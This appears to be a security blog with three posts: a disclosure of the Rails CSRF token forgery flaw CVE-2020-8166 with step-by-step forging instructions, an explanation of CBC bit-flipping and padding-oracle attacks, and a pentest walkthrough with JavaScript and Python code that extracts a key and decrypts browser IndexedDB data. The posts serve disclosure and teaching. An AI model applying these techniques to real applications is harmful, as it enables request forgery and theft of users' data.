Forging CSRF Tokens in Hardened Rails Environments before 6.0.3.1 and 5.2.4.3 (CVE-2020-8166 Explained)

Ruby on Rails 6.0.3.1 and 5.2.4.3 have been released, and they include a patch for CVE-2020-8166, which we had reported via HackerOne.

The vulnerability is the “ability to forge per-form CSRF tokens given a global CSRF token”. What this means is that in hardened environments where each form is protected by its own unique CSRF token, an attacker can forge a valid per-form token if they have access to the global CSRF token.

This blog post will, for the sake of brevity and focus, assume an understanding of CSRF and why CSRF tokens are important. If you need some background, I suggest reading up with these OWASP and Portswigger articles.

Rails CSRF Tokens and Per-Form CSRF Tokens

Rails provides the global CSRF token for the user session in the <HEAD> of the HTML file.

<title>Blog</title>
<meta name="csrf-param" content="authenticity_token" />
<meta name="csrf-token" content="hotX+T9rYuXWR5JNWc6A5MhMEGO8uv7H74KbvRz+WnL98caHe99MtGco8HsiyvUsE+bu1g6YMNCIuiq+0+56zQ==" />

The csrf-token is then submitted as the authenticity_token in all HTML form requests. In the default configuration, this is a global token. Consequently, if it were exposed CSRF attacks would be possible against any endpoint in the application.

To harden the environment, developers can enable per-form CSRF tokens. This means that each individual form requires its own CSRF token. This prevents exposure of a token on any given page from being used to execute a CSRF attack against something far more serious, such as changing a password.

The per-form CSRF token is created in request_forgery_protection.rb with the per_form_csrf_token() function.

per_form_csrf_token.png

The per_form_csrf_token() function takes session, action_path, and method parameters: method is the HTTP verb used in the request, action_path is the URL route in the action method in the <form>, and session is a special object Rails uses to track a user’s session. The function then calls csrf_token_hmac(), and passes the session object along with the action_path and method, the later two concatenated with a “#” and downcased. If the form looks like this

<form action="articles/edit/1" method="POST">
...

then the value passed to csrf_token_hmac() might look like ”articles/edit/1#post”. However, in practice, Rails forms embed a hidden <input> tag into the forms with the method, and this is the value used for the method parameter. For editing, Rails prefers to use the PATCH method, and reserves POST for creating new content. So what is passed to csrf_token_hmac() is going to look like “articles/edit/1#patch”.

The csrf_token_hmac() function processes both the session and the “action_path#method” by constructing an HMAC of the “action_path#method” string, which is called identifier.

csrf_token_hmac.png

Here the identifier is the “action_path#method” string, and the session is used to generate the secret key for the HMAC using the function real_csrf_token().

real_csrf_token.png

The real csrf token is stored in the session like so: session[:_csrf_token]. If it is does not exist already, it is generated using a Secure Random function, and stored base64 encoded. As it is binary data, the token is then base64 decoded before returning to the calling function. When called by csrf_token_hmac(), that binary token is the secret key used in the HMAC to construct the per-form CSRF token.

The Vulnerability

Assuming we do not know the secret key for the HMAC construction, the per-form CSRF token looks secure. We know what values are hashed, but don’t know the secret. However, this is where the vulnerability lies. If you recall the global csrf-token that is included in the <head> of the page, this token leaks the value used as the key. We can see this is the masked_authenticity_token() function.

masked_authenticity_token_annotated.png

At (1) we see that the raw_token is populated either with the value of per_form_csrf_token(), or real_csrf_token(). If the code takes the real_csrf_token() route, then raw_token contains the secret stored in session[:_csrf_token]. For generating the global CSRF token, this was found to be the case, which is why our exploit was successful. Next, a one_time_pad is generated at (2) using a Secure random number generator. This one time pad is then XOR’d with the raw_token. One time pads are considered extremely secure. However, where the security completely falls apart is at (4), where the one time pad is prepended to the encrypted CSRF token and returned, base64 encoded. This is akin to encrypting sensitive secrets each with their own key, but providing the key along with the ciphertext.

To exploit this, we must simply do the following.

  1. Get access to a global CSRF token, either through some sort client side code execution, or in the way we discovered the vulnerability, by initially finding the global token exposed in a URL

  2. Base64 decode the token

  3. Split the token in half, separating the one time pad from the masked token

  4. XOR the two together, thereby unmasking the token

  5. Identify an endpoint that is protected by per-form CSRF tokens. Lets say that endpoint sits at “/articles/2”, and we know that the method used is “patch”

  6. Forge the per-form token by creating an HMAC using SHA-256 where the secret key is the unmasked token, the hashed value is “/articles/2#patch” and take the digest, but not the Hex digest of the hash. We want the binary and not a hexadecimal string

  7. We know that Rails will attempt to unmask our forgery, so we need to provide our own one time pad that will not corrupt our forgery. The answer to this is simple, since anything XOR’d with zero (0) is itself. So we prepend our forgery with nulls of the correct length.

  8. Finally prepare the encoding. First base64 the null one time pad and forgery, then URL-encode that.

  9. This can then be used in a CSRF attack as the authenticity_token for a form updating “/articles/2”

The Patch

Since the vulnerability lies in the real_csrf_token() exposing the secret CSRF token through the masked_authenticity_token() function, the fix that was implemented in Rails 6.0.3.1 and 5.2.4.3 protects that token with another HMAC construction. In the patch for masked_authenticity_token() we see:

Screen Shot 2020-07-27 at 9.40.51 PM.png

real_csrf_token() has been replaced by global_csrf_token(). What this new function does is nearly identical to the per-form CSRF token generation, except the value to be hashed is a known constant.

Screen Shot 2020-07-27 at 9.41.28 PM.png

Hashing a known constant is fine because the hashed value was never the issue. It is the key that is used to create the HMAC that is now kept secret. real_csrf_token() exposed the secret, but global_csrf_token() now returns an HMAC that uses the secret, but does not reveal it. The server can now verify the validity of the global CSRF token without exposing the secret key to the browser.

Timeline

8 November 2019 - Disclosed to Hackerone

25 Novermber 2019 - Vulnerability verified

18 May 2020 - Patch released/Bounty awarded

CBC Mode is Malleable. Don’t trust it for Authentication

On a recent pentest, I encountered an authentication system that used a block cipher in CBC mode, which I was able to break using a Padding Oracle. The vulnerability required access to valid ciphertext, which limited the scope of the attack, but it was possible to decrypt a full authentication token in about an hour even though the token was encrypted with AES-256.

Cryptography is difficult to implement securely due to the fact that it is complicated and requires many moving parts, and if any of these components are not handled properly, the entire system can be compromised. 

The problem with CBC mode is that it is malleable. Recently, researchers broke PDF encryption using CBC Gadgets to inject content into an encrypted document (https://pdf-insecurity.org/encryption/cbc-malleability.html). The notion that simply because something is encrypted it can be trusted is false. Here are some reasons why.

Bit Flipping Attacks

In CBC mode, each block of plaintext is XOR’d against the previous block of ciphertext BEFORE encryption (the first block of plaintext is XOR’d against a block known as the Initialization Vector). This makes the value that is encrypted completely dependent on the prior ciphertext block. 

During decryption the process is in reverse. A block is decrypted to an intermediate value, and then this intermediate value is XOR’d against the previous ciphertext block to return to the original plaintext. 

XOR, or Exclusive OR, is a commutative operation, much like addition. For example,

a = b ⊕ c
b = a ⊕ c
c = b ⊕ a

Also, anything XOR’d against itself will become 0

0 = a ⊕ a

A ciphertext is by design a public thing. The plaintext and the key are the secrets. So in a crypto system, an attacker can see a ciphertext. 

The problem with CBC mode is that the decryption of blocks is dependant on the previous ciphertext block. This means attackers can manipulate the decryption of a block by tampering with the previous block using the commutative property of XOR.

Say an authorization token contains the value and it is encrypted using AES-256 in CBC mode

loggedin=0

Assume an attacker also knows the structure of this token; i.e. they know that the value of 0 is in the 10th position of the block. If the token decrypts to

loggedin=1

then the application will assume the request is authenticated. This is very easy to forge in CBC mode by manipulating the previous block.

Walking through this step by step

  1. The loggedin=0 block is decrypted to the intermediate value, but it is not yet the plaintext loggedin=0

  2. The intermediate value is XOR’d against the previous block

  3. The 0 in the 10th byte of the resulting plaintext is the result of the XOR between the 10th byte of the previous block and the 10th byte of the intermediate value, ie

    0 = previous_block[10] ⊕ intermediate_value[10]

In order to authenticate, an attacker needs to make the following construction true

1 = previous_block[10] ⊕ intermediate_value[10]

This example is simple, because anything XOR’d by itself is 0, so when the plaintext decrypts to 0 here, we know that

previous_block[10] == intermediate_value[10]

To get an output of 1, we simply need to chain an additional XOR. The value is easy to calculate and must be placed in the 10th byte of the attacker’s previous block.

1 = previous_block[10] ⊕ intermediate_value[10] ⊕ 1

Under such an attack, the attacker’s previous block will decrypt to garbage, so for this to work, that garbage needs to be discarded by the application (think of tokens that are split on &, for example). If an attacker can safely get the application to ignore the garbage, then the target block would decrypt to a forged authenticated token.

Note, CTR mode is also vulnerable to an attack like this, but in an even more direct fashion, as previous blocks don’t need to be tampered with.

Padding Oracles

While Padding Oracles do not recover the encryption key, a ciphertext encrypted with that key can be decrypted with 256 guesses per byte. The reason the vulnerability exists is because block ciphers must have valid padding, and encryption algorithms will handle the padding for developers during encryption. Consequently, during development and testing, valid ciphertexts are used and developers may never even be aware padding exists. This is dangerous because not handling padding errors safely can compromise the system.

So what is padding and why is it necessary?

A block cipher deals with fixed sizes of data, or blocks. In AES, the block size is 16 bytes, or 128 bits. A ciphertext block will always be 16 bytes, and so plaintext must also always be in blocks of 16 bytes. Real world scenarios don’t conform to such requirements, however. If the plaintext is 20 bytes in length, the first 16 bytes will form a block, and the remaining 4 bytes will be 12 bytes short of the 16 byte block size. Those remaining 12 bytes will get filled with padding.

The PKCS#7 standard defines how this padding is constructed, and it is quite simple. The number of padding bytes will be filled with the value of how much padding is necessary. To demonstrate, here we have 13 bytes of plaintext, and 3 bytes of padding. So we pad the 13 bytes with 3 bytes of \x03.

s  o  m  e  p  l  a  i  n  t  e   x   t  \x03  \x03  \x03
0  1  2  3  4  5  6  7  8  9  10  11  12  13    14    15

Padding can be anywhere from 1 to 16 bytes. The reason 16 bytes of padding would exist is if the plaintext evenly falls into 16 byte blocks. An additional block of only padding would then be required so that the algorithm knows the padding is valid. 

During decryption, a ciphertext is first decrypted and then the padding is discarded. If the ciphertext was not tampered with, then the padding will be valid. But if the padding can’t be found and the application errors, then an attacker can leverage this error as an oracle. 

Using techniques similar to those in the bit flipping attack, an attacker can force decryption of a block to one that has valid padding if the application provides information when the padding is invalid. This is because for each byte in the target block, there will be an 8bit value in the previous block that XORs the intermediate value into valid padding. For instance, for the last byte of the block, we are looking for a padding of \x01. So a valid equation would look like this:

attackers_previous_block[15] ⊕ intermediate_value[15] = \x01

Using XORs commutative property, and the original previous block, we can then decrypt the last byte of the target block

intermediate_value[15] = attackers_previous_block[15] ⊕ \x01
plaintext[15] = original_previous_block[15] ⊕ intermediate_value[15]

Knowing the last byte of plaintext, the attacker would then need to find a block that decrypts to intermediate values that end in \x02\x02, \x03\x03\x03, \x04\x04\x04\x04, etc. This allows for an efficient decryption of a ciphertext without ever knowing the key, simply because the application didn’t handle an error.

Recommendations

Just because something is encrypted, doesn’t make it trustworthy. To ensure the integrity of ciphertexts, sign them with a Message Authentication Code (MAC), or consider using a block cipher mode that provides authentication, such as GCM. For authentication tokens, using an HMAC with SHA-256 is advisable.

Decrypting IndexedDB with Javascript

IndexedDB is a NoSQL JSON based key store in the browser that allows for more capacity than basic Web Storage.  While testing a web application built with Salesforce, I came across an instance of an encrypted IndexedDB and naturally wanted to know what was being stored in the browser, and if it would be of any use to my engagement.

While browsing the database using Chrome Developer tools, I noticed meta-data in the database which informed me that the Cipher was AES-CBC, and an Initialization Vector (IV) was conveniently provided with each entry. So where was the key? 

With a bit of further inspection I found the key inside the landing page’s source code. It was appropriately named key and was a javascript array of signed integers. Here is an example (generated randomly for this post):

key = [ 11,  -100,  -67,  53,  238,  63,  194,  -102,  51,  95,  142,  -21,  180,  -227,  124,  -86 ];

Unfortunately this is an array of signed integers, a format which is not suited to use as an AES key to decrypt our IndexedDB.

For those interested in following along, load this page in your browser. I used a node.js application serve the HTML, however this is not necessary.

<html>
<body>
<script>
key = [ 11,  -100,  -67,  53,  238,  63,  194,  -102,  51,  95,  142,  -21,  180,  -227,  124,  -86 ];
</script>
<script>

const dbName = "secrets";
var request = indexedDB.open(dbName, 2);
const customerData = [{'ciphertext': [128, 154, 180, 134, 68, 203, 39, 166, 204, 92, 101, 1, 105, 130, 152, 197, 107, 39, 213, 163, 35, 181, 52, 212, 161, 177, 214, 185, 142, 107, 127, 188, 154, 51, 36, 38, 200, 5, 64, 132, 249, 154, 90, 167, 21, 251, 158, 89, 194, 61, 209, 76, 180, 147, 253, 14, 238, 195, 180, 136, 104, 77, 19, 6, 19, 104, 210, 92, 60, 127, 4, 21, 39, 86, 37, 69, 36, 222, 182, 157, 175, 193, 194, 129, 9, 233, 131, 159, 141, 39, 151, 82, 81, 47, 41, 180, 176, 203, 41, 175, 76, 16, 177, 236, 241, 127, 62, 12, 54, 97, 55, 7, 208, 188, 173, 204, 14, 22, 217, 142, 48, 229, 120, 211, 252, 169, 152, 161, 19, 113, 209, 17, 15, 152, 27, 57, 99, 84, 49, 227, 254, 158, 103, 124, 49, 214, 116, 104, 74, 80, 78, 95, 52, 210, 175, 116, 49, 195, 174, 137], 'id': 1234, 'iv': [50, 115, 62, 11, 44, 82, 42, 69, 117, 86, 77, 66, 101, 101, 86, 11]}]

request.onerror = function(event) {
  // Handle errors.
};
request.onupgradeneeded = function(event) {
  var db = event.target.result;
  var objectStore = db.createObjectStore("customers", { keyPath: "id" });

  // Create an index to search customers by name. We may have duplicates
  // so we can't use a unique index.
  objectStore.createIndex("iv", "iv", { unique: false });
  objectStore.createIndex("ciphertext", "ciphertext", { unique: true });

  // Use transaction oncomplete to make sure the objectStore creation is 
  // finished before adding data into it.
  objectStore.transaction.oncomplete = function(event) {
    // Store values in the newly created objectStore.
    var customerObjectStore = db.transaction("customers", "readwrite").objectStore("customers");
    customerData.forEach(function(customer) {
      customerObjectStore.add(customer);
    });
  };
};
</script>
</body>
</html>

Once loaded, you should be able to see the encrypted data in IndexedDB, structured in arrays of bytes (stored in JSON as signed ints).

indexeddb_arr_devtools.png

I set a breakpoint on the first line after the key was defined. This allowed me to work in the JS console to extract the key as a buffer of raw binary, Base64 encoded for easy handling.

key_buf = new Uint8Array(key.length);
key_buf.set(key);
binary = '';
for(var i=0;i<key_buf.length;i++) {
    binary+=String.fromCharCode(key_buf[i]);
}
window.btoa(binary);

This gives us the key in a format we can copy/paste into other scripts.

C5y9Ne4/wpozX47rtB18qg==

So now we have the key, but how can IndexedDB be decrypted using this information? 

First, I needed to dump the database. For this task I found Dexie.js to be invaluable. Modifying Dexie’s sample code, I created a function called “dumpy” which walked the entire database and for each table, would convert the ciphertext and IV to base64 and dump it to the console.

dumpy = function(databaseName) {
    var db = new Dexie(databaseName);
    // Now, open database without specifying any version. This will make the database open any existing database and read its schema automatically.
       db.open().then(function () {
        console.log("var db = new Dexie('" + db.name + "');");
        console.log("db.version(" + db.verno + ").stores({");
        db.tables.forEach(function (table, i) {
            var primKeyAndIndexes = [table.schema.primKey].concat(table.schema.indexes);
            var schemaSyntax = primKeyAndIndexes.map(function (index) { return index.src; }).join(',');
            console.log("    " + table.name + ": " + "'" + schemaSyntax + "'" + (i < db.tables.length - 1 ? "," : ""));
            // Note: We could also dump the objects here if we'd like to:
             table.each(function (object) {
                // here were convert from arrays to base64
                object.iv = arr_to_b64(object.iv);
                object.ciphertext = arr_to_b64(object.ciphertext);
                console.log(JSON.stringify(object));
             });
        });
        console.log("});\n");
    }).finally(function () {
        console.log("Finished dumping database");
        console.log("==========================");
        db.close();        
    });;
}

The function is written specifically for this application and a few things are worth noting when applying this technique in other scenarios. First, since IndexedDB is an object store, we need to know the format of it’s objects, which is easy to learn by browsing the database in Developer Tools. In this situation, each object has a ciphertext and iv attribute. Simple enough.

I converted the ciphtertext and iv from arrays of signed integers into binary, and then base64 encoded them. For this conversion I used the following function:

function arr_to_b64(arr) {
    var binary = '';
    var bytes = new Uint8Array( arr );
    var len = bytes.byteLength;
    for(var i=0;i<len;i++) {
      binary+=String.fromCharCode(bytes[i]);
    }
  return window.btoa(binary);
}

Then in the table.each() loop within dumpy, I called arr_to_b64 on both object.iv and object.ciphertext.

Running dumpy first needs Dexie.js to be available, so I ran the following from the console:

script = document.createElement("script")
script.onload = function() {console.log("Script ready")}
script.src = "https://unpkg.com/dexie/dist/dexie.js";
document.getElementsByTagName("head")[0].appendChild(script)

Once the console outputs “script ready”, Dexie has been loaded.

Then we run our function dumpy and provide the database name:

dumpy("secrets")
indexeddb_dumpy.png

So now we’ve dumped both the IV and ciphertexts for each item in the database. We can copy that offline for decryption using Python:

import base64
from Crypto.Cipher import AES

key = base64.decodestring('C5y9Ne4/wpozX47rtB18qg==')

ct = base64.decodestring('gJq0hkTLJ6bMXGUBaYKYxWsn1aMjtTTUobHWuY5rf7yaMyQmyAVAhPmaWqcV+55Zwj3RTLST/Q7uw7SIaE0TBhNo0lw8fwQVJ1YlRSTetp2vwcKBCemDn40nl1JRLym0sMspr0wQsezxfz4MNmE3B9C8rcwOFtmOMOV40/ypmKETcdERD5gbOWNUMeP+nmd8MdZ0aEpQTl800q90McOuiQ==')
iv = base64.decodestring('MnM+CyxSKkV1Vk1CZWVWCw==')

cipher = AES.new(key, mode=AES.MODE_CBC, IV=iv)

pt = cipher.decrypt(ct)
print pt

Note this code doesn’t handle any padding, so there will be some garbage bytes at the end. But the value in Indexeddb now decrypts to:

[{"age": 35, "ssn": "444-44-4444", "name": "Bill", "email": "bill@company.com"}, {"age": 32, "ssn": "555-55-5555", "name": "Donna", "email": "donna@home.org"}]